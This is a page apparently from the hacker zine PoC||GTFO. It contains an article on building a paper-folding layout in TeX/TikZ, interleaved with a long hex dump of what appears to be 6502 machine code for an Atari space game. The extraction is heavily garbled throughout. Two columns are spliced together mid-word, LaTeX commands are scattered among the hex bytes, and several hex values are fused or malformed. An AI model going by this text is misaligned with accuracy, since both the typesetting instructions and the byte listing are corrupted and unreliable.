Grégoire, Gynvael Coldwind and some incompatibilities will remain. Philippe Teuwen. @angealbertini Ange Albertini http://github.com/corkami/ 17 SAA-ALL 0.0.5 The \TeX{}nicalities of Paper Folding File Formats Three years ago, I expFirst, we create a box containing a mini-experimented with a fold- ing puzzle in PoCkGTFOpage containing the entire content of the outerO issue 0x11. The editors andIeventuallydecidedtwo columns: decided to scrap the puzzle be- cause it distracted from from the underlying content \newsavebox{\foldedcontent}% ofthearticleinwhichit\savebox{\foldedcontent}{ % it was to be inserted. The idea did eventuallyinspire\begin{minipage}{0.5\foldedwidth } inspire my paper airplane puz- This will be the content that zle from page 21 of PoCk is in the outer columns. oCkGTFO 0x13:02, but the implementation of the pap\end{minipage}% paper airplane was much simpler; a straightforward} ard exercise in TikZ. # # Next, create the two outer columns using Cut Here if Printing on A4 Cut Here if Printing on A4 1 2 TikZ’s clipping feature, and distribute them Самиздат horizontally using \hfill: 00 98 dd a2 05 1a ad d7 aa ad d4 a2 19 d0 d0 22 19 f0 00 8f 50 d3 ba 0f 20a a2 fd f3 00 b0 a9 11 09 0b e0 de 35 0c bc 6c 9d 2a 7d 85 0b 9d a9 6b 35 01 0b 02 85 fd 69 f9 b0 ff 38 ff 9d 85 05 a9 0f 49 63 0f e0 02 d0 04 a9 29 50 6a f0 0a b0 60 8a a9 86 01 0f 94 0b 93 6d ef 49 81 9d e5 f9 86 85 d0 09 84 01 38 9d 60 5b 64 ad 26 29 0f 8c fb f8 b0 a6 bd a2 d2 29 85 a9 10 50 cb b5 02 0a 6a 8e 06 ca 29 c9 c6 ea d0 ad 85 85 b0 04 d2 60 cc 4c 98 09 bf 47 05 30 0a 09 c6 6a ca 00 ad c0 a9 e0 08 ad ad 02 86 10 a0 9d 79 8f 60 c9 6b 99 d0 69 6b 07 f0 01 8a 85 0b bd 84 6c cb 86 c6 90 e1 29 18 8d f9 7f c8 e5 a5 68 9e c8 a5 0a 08 85 05 9d a2 c8 09 78 86 e6 c9 1a 40 a0 43 8d 6d f2 62 ad 85 00 d2 d2 90 9d ba a9 87 65 10 a4 f0 b9 31 a2 10 0a 4a d2 f0 90 29 18 88 6a 00 0a a9 02 88 ad 72 0a 90 85 d2 60 0e 85 a0 40 60 e9 3c 6a 07 a5 ad e4 48 03 0b 30 bb d8 99 01 8d a9 a4 70 dd 0a be a9 8d f9 08 a6 85 6b 30 02 0d 0b 0b a4 09 71 b0 09 8f 9d c9 bd 06 e5 78 a9 1f f0 10 dc 7d 9d bf 11 49 6d bd 09 30 0a c6 02 9d 08 09 a6 8d d2 bb 8d 4a 3f e5 aa 11 d5 40 e9 e8 6b c9 94 d2 10 0a d9 00 d2 69 6d 7f 8e a5 b9 10 8d a6 9d 2c 02 a9 ad d2 a9 02 18 e6 29 03 0a 65 0a ca 80 be 00 a0 8d a8 11 0a 0d 8d 8e 38 d2 a2 f0 18 d3 ca a9 fc a9 a0 df 91 50 ad 47 4a 85 09 0a 78 d9 be 99 01 02 b9 0a 08 17 85 85 d0 c6 8d 4a 7f f0 ad 86 a5 dd 6a d0 e7 ce 12 c9 f0 00 ba 24 b0 1a 4a 29 0a 7f ca 33 bd e5 03 8d a4 8d 99 7d 69 dd b5 0a 0a a9 8a c9 0f a0 e2 10 aa 0a e0 41 0f 09 20 a4 df 7d be d3 c0 f8 d2 65 bc 9f 90 d8 62 d3 09 a9 d0 e1 09 1f a5 18 18 9d 08 10 00 8e 14 0e 85 64 c6 05 b9 a3 02 fc 8d 0c d0 d2 03 bc 80 c9 ca 8d a5 a2 f0 07 e0 37 8a 38 9d 81 c9 09 f0 72 00 29 35 a9 bc 0d 0a 18 3e 07 a9 e8 f0 65 60 d0 8d bb b0 90 85 8d 98 b0 0a 60 37 0a 0c f0 d0 1f 09 d6 84 09 a9 02 aa 8d c4 03 de aa 11 40 e5 9d 0a 2e ca 09 30 49 a5 64 ad 0d 80 bd 01 08 29 85 4a e0 10 18 0a 8d a5 ad 08 9d 60 85 99 90 8d ad a9 c9 44 e0 4a 1b e8 a9 0a 3d 60 bc c9 bb cf ff 6c da 70 f1 0b bd a2 65 4a 90 b3 0f aa 69 b1 bd 42 85 a9 65 c9 a9 4c 69 13 02 de a8 f8 a6 a2 d2 18 21 93 bd d1 c1 09 09 ef 07 8d d0 d0 a5 6a b0 4c f8 04 8f 20 a6 69 84 85 a3 10 a9 0b 08 80 18 65 05 18 d0 8d 85 00 07 85 ff c0 bd ca 80 38 c9 c0 dd 18 e0 a2 ca ff 7f a2 30 00 a0 85 09 f2 a0 8d 09 85 4a ca b2 0d 49 29 3f 9f 69 96 7d a3 95 0f 0b 55 dd 01 b7 23 34 8a c8 a0 c6 08 50 85 fe bf a2 07 ac 45 69 64 9d e8 65 f6 b3 64 fe 81 04 a9 09 8d 09 20 ff 20 0a e1 8f 10 a6 9d a9 85 a2 bd d0 0a 10 29 49 10 a9 85 a5 ca 69 08 71 74 05 d1 74 76 d2 04 a2 b4 00 18 0a a5 50 85 85 b0 e6 8d a5 04 b0 ad a2 a9 2e d0 68 04 d2 0a d1 c2 90 8d 8c f1 bb 2c d0 02 85 10 07 e0 a6 85 a2 d2 e5 20 10 90 01 30 28 6c 8d 02 fa 00 0a 8e 08 ca e1 29 08 69 24 8b 85 10 a9 ad a5 a9 c9 c5 72 c9 08 3c 85 9d ca c3 e3 38 02 4a a5 bd 00 a9 d1 0d 0d 85 c6 6a a2 4a b4 7f 9d 6b 85 a9 1f 30 0e 85 ba 4a b9 a2 e6 d6 59 9d a9 f0 01 82 4a 20 ac f0 85 a2 6b 80 e3 69 bc 4a 03 6b 10 ec 85 85 a5 ff d0 8a 30 20 68 85 00 1e d2 49 85 70 09 ee b1 00 a9 a9 04 be a6 97 10 c8 a9 13 71 b0 18 ae 2c ca 0d 04 a2 85 8d bd 60 09 1f a2 ad ff e5 1b 01 50 9d 76 f1 a9 8f b0 30 9d a0 20 c0 a5 0e d0 40 60 07 85 38 e0 a5 a9 f7 7f 09 60 04 08 f0 a9 8d 71 d0 90 ff 5a 85 c0 4a c9 d0 ba a5 c9 d3 c0 b4 09 00 a5 bd 50 ad 50 80 bd d0 85 09 11 ba 50 d3 fe bd 01 a2 cc \noindent\begin{tikzpicture}[remember picture] \clip[use as bounding box] (0,0) rectangle 00 7f 47 47 47 47 47 7f 00 30 10 10 10 38 38 38 00 78 08 08 78 40 40 40 78 00 78 08 08 7c 0c 0c 7c 00 60 60 60 6c 7c 0c 0c 00 78 40 40 78 08 08 78 00 78 48 40 40 7e 42 7e 00 7c 44 04 1c 10 10 10 00 38 28 28 28 7c 6c 6c 7c 00 7c 44 44 7c 0c 0c 0c 00 00 00 00 00 00 00 00 38 38 38 00 00 38 38 38 80 80 80 80 80 80 80 ff 00 3c 20 20 78 60 60 7c 00 00 66 99 99 99 66 00 00 00 00 00 7e 00 00 00 00 00 18 18 18 7e 18 18 18 00 18 7e db 99 db 7e 18 66 66 66 66 66 2c 38 30 00 7c 44 44 7c 68 68 6c 6c 00 1c 3e 63 5d 63 3e 1c 00 46 46 44 7c 64 66 66 fe 92 10 18 18 18 18 18 fc 8c 8c 80 80 80 84 fc 00 00 00 00 00 00 00 ff 80 80 80 80 80 80 80 80 80 00 00 00 00 00 00 00 80 80 aa 9c be 9c aa 80 ff 80 98 80 b6 80 8c 80 ff 80 8e 80 b8 80 9c 80 ff 80 b0 98 be 98 b0 80 ff ff 00 00 6c 6f 6e 67 00 72 61 6e 67 65 00 73 63 61 6e 00 00 00 00 00 00 61 66 74 00 76 69 65 77 00 00 00 00 00 00 67 61 6c 61 63 74 69 63 63 00 63 68 61 72 74 00 00 00 60 46 1a a1 f0 47 35 0d 07 07 07 07 07 07 07 07 80 46 1f 0d 46 71 09 06 06 41 80 02 a9 00 8d 0f d2 85 66 85 85 62 85 63 a9 03 8d 0f d2 a0 2f a9 ff 84 65 85 64 a9 00 aa 9d 00 d0 9d 00 d4 e0 0f b0 03 9d 00 d2 9d 00 d3 9d 67 00 e8 d0 ea ca 9a d8 a9 a9 02 20 0f ae a9 51 8d 16 02 a9 a7 8d 17 02 a9 d1 8d 22 02 a9 18 8d 00 02 a9 a6 8d 23 02 a9 a7 8d 01 02 a9 04 8d 02 d3 a9 11 8d 1b d0 a9 a9 03 8d 1d d0 20 ba b3 a2 0a 20 45 b0 a5 64 29 80 a8 a2 5f a9 08 20 f1 ad a9 20 85 71 a9 80 8d 02 d4 a9 02 8d 03 d4 a9 3e 8d 00 d4 a9 00 00 8d 07 d4 a9 10 85 79 a6 62 bc 0c bf 20 23 b2 a9 40 8d 0e d2 58 a9 (0.5\wd\foldedcontent,-\foldedheight); c0 8d 0e d4 a5 67 f0 fc a9 00 85 67 a5 7a f0 20 a2 04 e8 bc 5b 0c b9 b9 00 08 85 68 b9 64 08 85 69 bc 8c 0c bd bd 0c 91 68 e4 7a 90 e6 a9 00 85 7a a5 c0 30 2d a6 79 86 7a bd f9 0b 9d 5b 0c a8 b9 00 08 85 68 68 b9 64 08 85 69 bd 2a 0c 4a 4a 9d 8c 0c a8 b1 68 9d bd 0c 1d ee 0c 91 68 ca e0 04 d0 d7 a5 66 10 0e a9 00 8d e3 17 8d e4 17 8d bc 17 8d 8d bb 17 a9 00 ac 5f 0c ae c1 0c 99 00 03 c8 ca 10 f9 ac 5e 0c ae c0 0c 99 00 07 c8 ca 10 f9 ac 5d 0c ae bf 0c 99 00 06 c8 ca 10 f9 ac 5c 5c 0c ae be 0c 99 00 05 c8 ca 10 f9 ac 5b 0c ae bd 0c 99 00 04 c8 ca 10 f9 ad 90 0c c9 01 a4 e8 ae fd 0b 8e 5f 0c ad f2 0c 85 6a 8d c1 0c 0c b9 e4 b8 b0 03 2d 0a d2 9d 00 03 c8 e8 c6 6a 10 ef ad 8f 0c c9 01 a4 e7 ae fc 0b 8e 5e 0c ad f1 0c 85 6a 8d c0 0c b9 e4 b8 b0 03 2d 0a 3 0a d2 9d 00 07 e8 c8 c6 6a 10 ef ad 8e 0c c9 01 a4 e6 ae fb 0b 8e 5d 0c ad f0 0c 85 6a 8d bf 0c b9 e4 b8 b0 03 2d 0a d2 9d 00 06 e8 c8 c6 c6 6a 10 ef a4 e5 ae fa 0b 8e 5c 0c ad ef 0c 85 6a 8d be 0c b9 b1 b9 9d 00 05 e8 c8 c6 6a 10 f4 a4 e4 ae f9 0b 8e 5b 0c ad ee 0c 85 6a 8d 8d bd 0c b9 b1 b9 9d 00 04 e8 c8 c6 6a 10 f4 ad 2a 0c 8d 00 d0 ad 2b 0c 8d 01 d0 ad 2c 0c 8d 02 d0 ad 2d 0c 8d 03 d0 ad 2e 0c 8d 07 d0 18 18 69 02 8d 06 d0 69 02 8d 05 d0 69 02 8d 04 d0 24 d0 30 3a a5 c8 f0 19 85 6d a4 79 84 6e 18 98 aa 69 31 a8 20 9b b6 98 aa a4 6e 20 9b b6 b6 88 10 eb a5 c9 f0 19 85 6d a4 79 84 6e 18 98 aa 69 62 a8 20 9b b6 98 aa a4 6e 20 9b b6 88 10 eb a6 79 e0 05 b0 05 bd 8c 0c f0 19 38 bd bd d3 0a e5 70 9d d3 0a bd 40 0a e5 c1 9d 40 0a bd ad 09 e9 00 9d ad node[anchor=north] at 09 ca 10 db a6 79 e0 10 d0 02 a2 04 8a a8 a9 00 85 6b b9 66 0b 10 09 09 49 7f 18 69 01 b0 02 c6 6b 18 79 d3 0a 99 d3 0a b9 40 0a 65 6b 99 \ 40 0a b9 ad 09 65 6b 99 ad 09 98 18 69 31 c9 90 90 ce ca 10 c4 a0 04 04 98 aa a9 02 85 6a bd ad 09 c9 02 90 10 0a a9 00 9d ad 09 b0 05 fe ad 09 49 ff 9d 40 0a 8a 18 69 31 aa c6 6a 10 e0 88 10 d7 a5 d0 c9 02 02 b0 5c a6 79 a9 ff bc ad 09 c4 d0 f0 4b bd 0f 0a d0 12 38 a9 00 fd 35 0b 85 6a a9 00 fd a2 0a 85 6b 4c 7d a4 bd 35 0b 85 6a bd a2 0a 85 85 6b 20 21 aa 20 1e b7 bd de 09 d0 12 38 a9 00 fd 04 0b 85 6a a9 00 fd 71 0a 85 6b 4c a4 a4 bd 04 0b 85 6a bd 71 0a 85 6b 20 21 aa 20 fb fb b6 ca 10 a6 20 62 b1 24 d0 50 31 a2 31 20 6f a7 2c 96 09 70 27 a6 79 bd 40 0a bc ad 09 d0 02 49 ff a8 b9 e9 0d 20 1e b7 bd 71 0a bc de de 09 d0 02 49 ff a8 b9 e9 0d 20 fb b6 ca 10 db a2 05 ca 10 03 4c 79 a5 a9 00 95 e4 9d ee 0c 24 d0 10 0b e0 03 90 eb ad 0a d2 a0 f2 30 2b 2b d5 e9 f0 e0 70 f3 bc 40 0a 24 7b 50 1e e0 02 b0 16 ad 2c 0c 18 7d db be 9d 2a 0c ad fb 0b 18 69 04 9d f9 0b ac 42 0a a5 76 29 0f 85 6b a b 6b 98 bc f9 0b c0 cc b0 af a4 d0 f0 02 49 ff c9 20 b0 a5 c9 10 90 02 a9 0f 85 6a 1d 8c 0c 4a a8 b9 2f be 95 e4 b9 7f be 9d ee 0c 98 4a 4a 4a 4a a8 b9 d1 bf c0 08 d0 03 4d 0a d2 a4 6a 59 db bf 45 6b bc df b8 99 ee 00 4c e7 a4 a0 af a6 81 a5 8b f0 0c c6 8b a0 4f 29 20 f0 04 a2 a2 42 a0 60 84 f4 86 f6 a6 79 bd 40 0a a4 d0 c0 01 d0 09 c9 f0 b0 03 6 09 30 30cb a9 ca 31 107e a0 de 7e 17 a2 3c7c 20 0a 18 28 a7 8a 10 28 b8bd a0 38 28 a9 81 03 7c 18 62 81 997c 7c 18 a0 81 55 7c fe 3c 1d 81 09 d6 de0d 18 20 82 88 c6 da 0d 18 a7 82 10 82 fa 0d 105a b8 ba fa 82 ee 0d 10 78 a9 fe 20 18 ee 30 38 7d 00 fe40 45 3c 7c 46 10 82 a0 ba 40 b0 3c 7c 1f 18 87 23 82 0a a0 6642 38 0d 7e 8c 20 82 8d 31 66 05 10 4d ff 9b a7 42 8b a2 42 06 18 a806 ff aa b8 5a 89 04 42 43 3c 12 b5 ff b8 ad 7e 89 20 10 04 3c 1b 78 ff c845 6e 7e 89 0a 38 42 7e 13 06 ff d0 44 09 5a 89 b1 38 04 6e 0b 8c e7 d8 d3 8d 42 0a41 60 6c 43 7a 08 78 e7 df 54 6f 44 16 52 18 44 06 7e ff a2 ff e8 41 09 54 0b 20 6d 44 0754 76 ff 75 ff f1 52 c9 7c 00 46 5c 18 42 20 7e ff a2 ff fa 42 0a 7c 0a 4c 09 3c 07 41 3c ff 4c49 ff 00 41 b0 54 14 45 aa 24 43 54 3c aa a1 43 ff 01 53 11 44 0b 45 a9 24 48 41 18 ff 75 20 7e ff 454f ae 24 0f 54 10 10 09 52 10 aa a1 43 7e 00 c4 4e 5c 3c 00 20 85 38 4a 49 38 ff 4c 4f 00 50 45 54 09 3c 00 5472 6a 28 0b 20 38 aa c1 4f 18 28 53 52 bd 24 0a 4f 79 bd 18 cd 31 7c aa b8 4b 3c 87 54 4f d3 28 51 d3 7f ad 3c 0b 3901 74 aa 97 c7 7e 50 52 4c 0a 38 4b 54 83 09 7e cc 37 0b 7c ff 98 41 ff 36 4f d0 4a 38 0f 41 29 4a ff 09 39 f8 6c aa 1a 5200 ff 87 59 48 4a 28 00 52 2b bd 18 4e d3 ff 38 aa 8e 42 50 ff 77 45 4f 4a 18 00 20 86 40 18 09 55 0c 38 aa 24 41 04 e7 46 44 5400 4a 18 0a 43 90 0a ff 4f 42 1e 10 aa 9f 47 30 66 1e d3 4f 01 aa 10 93 52 9a b0 7e d0 2d 1e 10 aa fd 45 40 ff 77 55 4e 00 bd 10 8b 55 a101 04 3c 11 53 1d 18 aa 25 20 01 ff 56 52 53 00 e9 e0 0f 49 a8 04 49 18 92 50 1c 3c aa fc 53 03 ff 1e 52 a0 3e 0e f8 00 53 ad 07 ff 10 56 41 1b 2c 55 66 43 84 ff 77 4f d3 1e 8d f8 00 45 29 00 c6 38 13 43 9f 3c 55 a0 4f a8 7e 46 55 54 10 6f fe 00 52 2b 80 6a 7c 4e 45 bf 3c aa 20 57 04 7e 91 4e 41 08 57 0a 20 c1 4a aa fe 15 20 df 18 55 20 20 00 00 94 44 52 04 fe 37 37 c1 a1 a5 38 4f 52 ff 08 aa 20 43 50 18 46 45 20 02 f8 21 c1 c1 38 b8 41 f8 10 55 20 41 04 3c 91 44 43 01 f8 32 4c c1 fe 97 44 08 38 55 52 50 02 7e 78 c1 4f 00 c0 30 4c c1 7c 99 49 50 55 45 54 02 ff 4e 42 4d 00 c0 00 20 c1 38 98 4f 4c aa 44 41 02 ff 06 4f 4d 81 f0 25 55 75 10 8c d3 3c 55 20 49 03 7e 52 41 82 c0 2e 4e c1 18 9d 45 6f 55 41 4e 0c 4b 54 4e 84 f0 25 49 0f 3c 1e 43 3c 55 4c d2 02 0f 45 44 88 32 54 0d 7e 9f 54 3c 55 45 4f 04 7e 44 45 90 27 53 0b 18 fd 4f 32 c0 52 4f 03 51 c3 52 9e 39 cd 09 25 52 64 30 54 4b ff 0f 4f 80 be 1a 49 07 fc 20 28 0c cf 49 10 8d 4d 00 a6 00 53 05 78 53 32 4e 45 07 4e 50 01 aa 00 53 01 9b 43 28 cf ce 04 07 4c 40 af 00 49 01 60 41 5a 46 4f 07 45 80 00 10 4f 0b b8 4e a9 46 56 04 54 0e 00 00 4e 07 97 c5 aa d3 49 02 45 09 b8 a0 05 98 4e aa 48 43 02 c8 04 5a 20 05 1a 47 ab 49 45 00 59 ff fc 20 03 49 ab 45 c5 07 50 08 5e 20 03 4e ac 4c 4e 0b 45 02 90 53 01 45 ac 53 05 52 0b ff 54 01 53 ad 49 ff 53 07 ff 41 09 ce ad 47 20 01 3f 52 08 45 ae 4e 02 01 0f 20 05 57 ae d0 0b 11 3f 02 c3 af 49 0e 1f 7f 00 4c b0 4c 06 2b ff 00 b1 4f 08 35 ff 00 b2 54 20 3d 00 00 b3 00 75 ff 0f b3 0e 7a ff 0e b9 10 c0 0c b9 ff 20 09 95 18 f0 95 ff ef 95 40 ff 60 0f ff 10 11 01 d0 22 f8 a9 20 d0 22 fc a9 28 a9 10 90 d4 aa 04 12 19 d0 01 d0 b9 50 8e a9d 6a e5 15 38 70 0b 0e ad 35 50 b9 9d d2 0a b9 0b 0a 40 a8 04 2c 99 6a 9d 20 07 6b 84 11 13 10 65 1d d0 a0 09 20 0a 30 09 78 96 18 40 bd bf ad 85 2c a2 b9 28 0d c0 9d 63 13 b2 0a a9 f0 79 01 a9 50 23 d3 21 08 8a 76 29 0e d0 20 99 10 c8 18 e6 01 f0 24 15 6a 74 bd 24 60 49 b7 10 7a a0 65 c6 60 b0 da d0 f1 6b a9 0a 0a 79 0a 9e 90 a5 20 c6 6d 70 68 d3 c6 71 c5 a0 0a 13 08 06 09 a5 b9 02 9d 00 c0 40 10 c9 04 97 18 18 b0 60 0a 96 c8 9d 08 99 b0 2c 69 1a 18 f6 71 b9 c8 0f c9 6a 05 0f 85 30 c9 10 fd 07 c8 09 a9 bd a5 e0 f0 10 6d 8a 88 00 a0 c8 8d 0a 00 d2 32 6a a9 85 86 e8 a9 6b 0d d2 71 a2 d0 a8 a9 a5 68 ff 00 00 0b 85 4b 04 9d 1d 08 20 6d df 86 49 a2 d2 04 01 99 8d 6a 70 b9 14 85 10 00 6b 6d 04 99 9d a9 19 bf 85 09 19 a2 38 e8 a2 e6 a5 b0 bf 0b d4 a9 f2 02 97 08 05 b0 cc db 6b 6b 70 3e a9 04 10 e7 bd 90 2c d9 d0 32 85 d0 a6 26 c9 bd 0f fd 88 d0 dd 6a f5 19 e2 c9 00 e8 a0 6a 79 05 a2 38 00 0f 85 8d c5 10 08 c6 60 e9 6b 49 26 86 a0 23 0f 96 29 bf 03 0f e8 ca 09 0c cc 85 3f 0a 11 0c a0 d0 99 6a ea 70 29 08 19 f0 60 2a a5 d8 29 6b a2 90 d1 09 6b a5 bd 09 d2 c9 08 e2 ce 9d cb 00 f0 26 04 d6 84 de 65 6a df 97 0a 9d c8 a5 85 6d 85 69 d0 08 6a d0 c5 fb 9d 18 e6 85 2c ad df b9 d9 0f 65 12 f8 6a d0 26 73 bf f0 01 01 c8 de 90 0a 29 e0 84 29 18 e9 0e c6 60 0a c6 3e 65 e0 29 69 0d 85 09 a2 08 f0 d2 08 60 cb e9 f4 09 0a 16 bd a4 a7 d2 ff 4b 02 00 9d c9 0f 07 49 0c a5 9d 10 5c d3 f0 60 60 6f 0a 49 99 a9 a9 05 6a bd c9 8c 4a 2a 38 6b 68 8d 5d 73 d2 10 4c ad 04 be dc 02 a2 85 00 e4 d6 03 9d 6a a5 b1 01 bf a5 05 f0 2a 0a b0 d1 85 10 02 0f a2 f0 84 90 6d 85 6a 00 29 09 f2 8c cf a2 a2 95 bd af 08 90 29 30 0f 00 0f e5 08 85 a0 01 d2 10 d2 c6 ac 9d e5 aa a9 c9 06 d2 10 29 a0 c0 6d c9 64 69 49 0a ca 03 05 d0 38 05 0a bd e0 0a e8 98 e4 04 e6 9d 69 e6 09 ad eb 8e f0 01 4a a9 d0 aa 06 ad ff e9 10 90 38 02 6a 02 5c 6a d6 dd d1 e0 4a 02 da 92 50 a2 b0 d3 0b 09 a9 a5 d0 ad 85 02 84 a5 06 4a 10 c6 85 09 95 70 c6 c0 d0 14 18 68 0b 0a f0 88 60 f0 4a 08 1c 6a 93 85 c0 d2 0b f0 69 e6 b0 40 eb 03 e9 d0 6a c9 f0 05 2c 4a ed 85 f0 b7 85 69 13 bd b5 f0 d0 a6 a5 bd da 70 a9 4a 90 d7 00 f1 00 85 e0 06 0f 88 b4 6b 6a a6 29 80 4a 10 a5 c0 20 69 bc b2 d0 29 ee f0 85 a6 dc 8e 4c 4a c0 0c 8a 19 0d a9 23 0c 98 10 7e 6a 85 a5 03 8a 21 d0 a8 10 e9 68 4c 8e dc ca a5 84 8f 6a f0 94 10 ff cd 08 9d 85 11 bd 86 09 ae 00 a9 85 c0 6a c9 85 c9 69 2a a0 02 ca 7d 0d a0 04 4a a5 a5 a8 0f bd a5 a9 c6 a2 03 9d 20 0f d0 4a 1d f5 a0 a2 68 6a 85 fb f0 10 09 e8 db 4a b0 d0 d2 12 85 85 be 86 0f a9 5a 8d c6 8f 0a 08 06 a9 51 3f d7 29 08 8e ea 08 a5 e0 c9 8d 04 69 29 b9 8a 90 e8 a9 f0 0c b2 b9 bf 90 68 6c a8 10 1a 01 db 2d 23 a8 5c 13 a5 85 03 b0 c9 f0 a5 8d 4c 7f bd c9 18 be 29 11 09 7c 60 3d 10 d2 4a 6b e9 2a c9 7d a4 d2 69 a0 e6 4a 86 b9 2a e1 bd 16 08 18 f6 d2 4a cd 2a c6 09 a2 8d 8d 10 a6 6a a4 91 16 7d b3 70 a5 ca d8 8a 05 a5 fe a6 a9 0b 08 85 4a d0 0b 02 20 d2 fc f0 d4 25 fd f0 a2 0c 8d 6a a5 30 c9 62 09 a2 3f c5 20 cc 60 a5 7f b2 69 ba 65 cf c5 8d 23 18 be c8 85 85 09 20 8c bd 85 8e 7e be a5 d0 c9 a5 8d 1e 0b 1b 85 c4 bc fd 8d 00 85 03 8d 11 a9 8f f0 a9 aa a5 6e ca cb 0a 95 85 a5 be 66 8d 1b 85 5d 00 6e a9 6a 85 20 64 b7 49 ff c9 10 90 02 a9 0f 0a 29 1c 05 72 a8 b9 90 ba 85 6a bd bd 2a 0c 29 03 a8 b9 b0 ba 25 6a 9d ee 0c ca e0 05 b0 ca 24 64 50 03 9 4c 9b a6 20 fe af ad 00 d3 a8 29 03 aa bd f5 ba 85 c9 98 4a 4a 29 03 03 aa bd f5 ba 85 c8 20 3d af 20 29 ae 2c 95 09 70 40 a5 7e f0 3c a5 (0.5\wd\foldedcontent,0) (leftfold) d0 d0 03 20 bf a7 ae 5c 09 a5 bf 30 05 aa 09 80 85 bf b5 e9 d0 0b 8a 8a 49 01 aa b5 e9 d0 03 ae 5c 09 8e 5c 09 a5 7c f0 13 a5 d0 c9 02 b0 0d 49 01 dd ad 09 f0 06 aa bd cf be 85 ca 20 e6 ac 20 79 aa a5 7b d0 d0 5c a5 eb f0 58 ac 42 0a c8 c0 02 b0 50 ac 73 0a c8 c0 02 b0 48 ac a4 0a c8 c0 02 b0 40 20 e1 ae a0 02 20 6b ac a2 7f a5 81 d0 1e a2 0a 0a 20 45 b0 a0 23 a2 08 20 0a b1 a2 5f a0 80 a9 08 20 f1 ad 20 0d ae a2 40 86 e3 a2 ff 86 8a a9 00 85 eb a9 02 85 be a2 01 20 6f b8 a2 0a 0a 20 a8 ae a4 63 ad 1f d0 49 ff 29 03 85 63 f0 1a 88 10 17 85 66 c9 02 b0 06 a9 00 a8 4c 5e a1 e6 62 a5 62 29 03 85 62 4c 5a a1 20 04 b8 b8 20 9b a8 20 16 b2 20 e4 b4 4c f3 a1 a9 ff 85 67 a9 e0 8d 09 d4 a6 f6 ad 0a d2 24 8a 50 07 30 04 29 72 09 40 aa a5 d0 c9 03 90 02 a2 a0 a0 86 f6 a2 08 b5 ee 9d 12 d0 ca 10 f8 8d 1e d0 20 ab b2 e6 77 d0 0d a5 66 30 09 e6 66 10 05 a0 00 4c 5c a1 4c 4b a7 48 8a 48 98 48 a9 e0 e0 ac 0b d4 c0 60 f0 02 a9 a0 8d 09 d4 a2 04 8d 0a d4 b5 f7 9d 16 d0 ca 10 f8 ad 08 d0 0d 09 d0 0d 0a d0 0d 0b d0 85 83 ad 0f d0 85 82 68 68 a8 68 aa 68 40 48 a9 00 8d 0e d2 a9 40 8d 0e d2 ad 09 d2 09 c0 85 ca 68 40 99 a4 00 e8 88 10 0e 20 82 a7 a9 05 85 a2 2c 95 09 70 09 a0 a0 02 bd f9 ba c9 fe d0 e4 60 a9 55 85 6b a5 a4 85 6e 29 7f 85 a4 a4 a5 b9 00 08 85 68 b9 64 08 85 69 a5 a6 4a 4a 85 6a a5 a6 29 03 a8 b9 b9 b0 ba 25 6b a4 6a 11 68 91 68 24 6e 10 04 e6 a5 d0 02 e6 a6 c6 a4 d0 d0 60 ae 5c 09 a4 a2 c0 05 b0 24 a5 a0 85 a6 b9 6e bf 0a 85 6c 90 90 0d a9 81 85 a4 a5 a1 85 a5 a9 aa 20 84 a7 e6 a6 a5 6c d0 e8 e6 a1 {\usebox{\foldedcontent}}; e6 a2 60 c0 0a 90 f9 b5 e9 f0 3c bd 71 0a bc de 09 f0 08 c9 0c 90 0a 0a a9 0b 10 06 c9 f5 b0 02 a9 f5 18 69 83 85 a0 bd a2 0a 49 ff bc 0f 0a d0 08 c9 05 90 0a a9 04 10 06 c9 fa b0 02 a9 fa 18 69 4d 85 a1 a9 a9 00 85 a2 a9 36 85 68 a9 1b 85 69 a2 0e a0 06 b1 68 29 55 91 68 88 10 f7 18 a5 68 69 28 85 68 90 02 e6 69 ca 10 e7 ae 5c 09 c8 a5 88 f0 f0 04 c6 88 d0 39 a5 a0 c9 81 90 33 c9 85 b0 2f a9 aa 8d fe 1b 8d 04 1c a5 a1 c9 4b 90 21 c9 4f b0 1d a9 aa 8d 9e 1c 8d a4 1c bd 40 0a c9 c9 0c b0 0e a0 a0 8c 40 1d 8c 68 1d 8c 42 1d 8c 6a 1d 84 a3 60 a4 c0 f0 61 a5 70 c9 fe b0 5c c9 80 90 03 20 b4 a9 a9 03 8d 5c 09 a9 90 8d 8d 8f 0c 85 ec a9 1f 8d 43 0a 38 ad fc 0b e9 77 18 65 c5 29 7f 85 8e 38 ad 2d 0c e9 7d 18 65 c4 29 7f 85 8f a5 62 f0 11 ad 0a d2 a4 d0 f0 f0 06 8d 2d 0c 8d fc 0b c9 10 b0 14 ad 0a d2 09 10 25 c6 8d 9a 0b ad 0a d2 09 10 25 c6 8d cb 0b 60 98 30 11 a9 ff 85 c0 a2 00 20 a6 b3 20 20 a7 b1 a0 1b 4c 8d a9 c6 91 f0 05 a2 02 4c 6f b8 a0 19 20 87 a9 a5 8f 85 8d a5 8e 85 8c 4a 29 07 aa bd b3 bf 85 c7 a4 92 84 90 a9 00 85 85 7b be c9 08 10 2e a9 ff 85 7b a0 00 a9 00 99 68 0b a9 01 99 af 09 ad 0a d2 25 c7 99 42 0a 98 18 69 31 a8 c9 93 90 e5 ad 42 0a 09 71 8d 8d 42 0a a2 02 4c be b7 f0 0e a9 ff 85 8b a2 06 20 a6 b3 a0 75 20 23 b2 60 a2 01 20 6f b8 a0 17 a9 00 85 71 85 c0 a9 10 85 79 a9 00 85 c1 c1 85 73 85 8a 8d 8f 0c 85 80 c0 17 f0 04 85 e9 85 ea 85 eb 85 ec 85 ed 85 75 8d 5c 09 4c 23 b2 c6 c2 10 68 a9 01 85 c1 a9 30 85 79 a9 03 03 85 c2 a6 c3 a9 12 85 69 ad 0a d2 29 03 a8 b9 3a bb 9d 71 0a b9 3e bb 9d a2 0a 20 be b7 8a a8 a9 05 85 6e 18 a5 68 69 50 85 68 9d d3 0a 0a a5 69 69 00 85 69 9d 40 0a a9 00 9d 66 0b 9d 97 0b 9d c8 0b a9 01 \end{tikzpicture}\hfill% 9d ad 09 a9 63 9d f9 0b 9d 2a 0c 20 c1 ac ca e0 11 b0 02 a2 30 c6 6e 6e 10 c7 86 c3 60 a9 00 85 6d a9 07 85 6e 46 6b 66 6a a5 d0 d0 0f bd 40 0a 4a 85 69 bd d3 0a 6a 85 68 4c 52 aa 38 a9 00 fd d3 0a 85 68 a9 a9 00 fd 40 0a 4a 85 69 66 68 06 6d 38 a5 6a e5 68 a8 a5 6b e5 69 90 06 85 6b 84 6a e6 6d 06 6a 26 6b 90 03 a9 ff 60 c6 6e 10 df a4 6d b9 b9 e9 0d 60 a5 c0 05 7b d0 f9 a5 86 f0 30 a6 89 